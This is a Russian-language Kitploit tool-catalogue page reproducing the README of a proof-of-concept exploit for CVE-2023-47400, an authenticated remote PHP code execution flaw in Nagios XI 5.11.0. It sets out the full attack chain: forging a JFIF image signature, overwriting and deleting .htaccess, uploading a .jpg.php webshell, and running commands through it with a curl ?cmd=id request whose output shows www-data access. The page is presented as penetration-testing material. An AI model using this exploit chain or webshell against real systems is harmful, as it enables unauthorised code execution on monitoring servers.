Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-47400 — Доказательство концепции для CVE-2023-47400 | Kitploit
Инструменты/GitHubGitHub/lucasvanhaaren/cve-2023-47400
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHublucasvanhaaren/cve-2023-47400

CVE-2023-47400

Доказательство концепции для CVE-2023-47400

Репозиторий
2132 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-47400

Доказательство концепции для CVE-2023-47400

Аутентифицированное удаленное выполнение PHP-кода через произвольную запись файла в Nagios XI 5.11.0


[!Note] Этот PoC основан на техническом обзоре, опубликованном группой NCC https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/

Этот PoC следует следующему процессу:

  • Загрузите валидное изображение с именем placeholder.jpg (только магические байты JFIF в заголовке, без содержимого)
  • Используйте функцию rename в Custom Includes, чтобы переименовать изображение в .htaccess (это приводит к перезаписи существующего файла .htaccess)
  • Используйте функцию delete в Custom Includes, чтобы удалить файл .htaccess
  • Загрузите PHP-полезную нагрузку (подделывая сигнатуру изображения через магические байты JFIF и двойное расширение .jpg.php)

Эксплуатация этой уязвимости приводит к удаленному выполнению кода на хосте Nagios XI, обходя фильтры загрузки файлов (через фильтры сигнатуры файла и расширения файла) и предотвращение выполнения PHP (через .htaccess).

[!Warning] Этот эксплойт удаляет файл <NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccess, присутствующий на хосте, чтобы разрешить выполнение PHP-кода!

Использование

  • настройка проекта:
root@kitploit:~
# create a venv to dependency isolation
python3 -m venv .venv
source .venv/bin/activate
# run pip install before running the exploit
pip install -r requirements.txt
  • настройте PHP-полезную нагрузку, которая будет размещена в папке загрузки изображений

  • запустите скрипт эксплойта:

root@kitploit:~
python exploit.py
# the exploit generates a webshell and upload it with uuid as filename
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
  • взаимодействуйте с размещенной полезной нагрузкой:
root@kitploit:~
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)
Скачать инструмент